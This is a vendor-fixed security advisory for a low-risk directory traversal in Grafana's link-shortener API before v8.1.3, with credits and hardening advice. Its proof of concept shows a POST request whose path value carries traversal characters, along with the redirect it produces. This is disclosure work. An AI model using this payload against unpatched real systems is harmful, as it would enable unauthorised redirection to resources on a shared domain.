usd-2021-0024 | Grafana

Advisory ID: usd-2021-0024
Affected Product: Grafana
Affected Version: < v8.1.3
Vulnerability Type: CWE-20: Improper Input Validation (https://cwe.mitre.org/data/definitions/20.html)
Security Risk: Low
Vendor URL: https://grafana.com/ 
Vendor Status: Fixed

Description

Grafana before v8.1.3 is vulnerable to Directory Traversal in its Link-Shortener.

If the Grafana instance is deployed alongside multiple applications on the same domain, this directory traversal allows to reference arbitrary files within the web root.

Grafana allows users to shorten their sharing links using a link shortener functionality. There is a filter in place that only allows relative URLs. In doing so, meta characters like  ..  are allowed, resulting in the possiblity to reference arbitrary resources outside of Grafana's base path.

Proof of Concept (PoC)

Note: the setup that was analyzed consisted of multiple applications that were deployed to different paths of the same domain (usd.de/a/, usd.de/b/, ...).

An exemplary request including a directory traversal is given in the following:

POST /monitoring/api/short-urls HTTP/2
Host: usd.de
[...]

{
"path":"pentest/....test"
}

The API responds with a shortened URL. If this URL is then opened, there is a redirect to arbitrary paths on the domain:

HTTP/2 302 Found
Content-Length: 76
Location: https://usd.de/monitoring/pentest/....test
Cache-Control: no-cache
[...]

<a href="https://usd.de/monitoring/pentest/....test">Found</a>.

Fix

It is recommended to harden the link shortener implementation. In doing so, consider all user input to the application as potentially malicious. All input to the application should be verified and if necessary replaced. Meta characters should be treated with care. It is recommended to use whitelisting wherever possible.

References

Timeline

Credits

This security vulnerability was found by Tobias Hamann and Lauritz Holtmann of usd AG.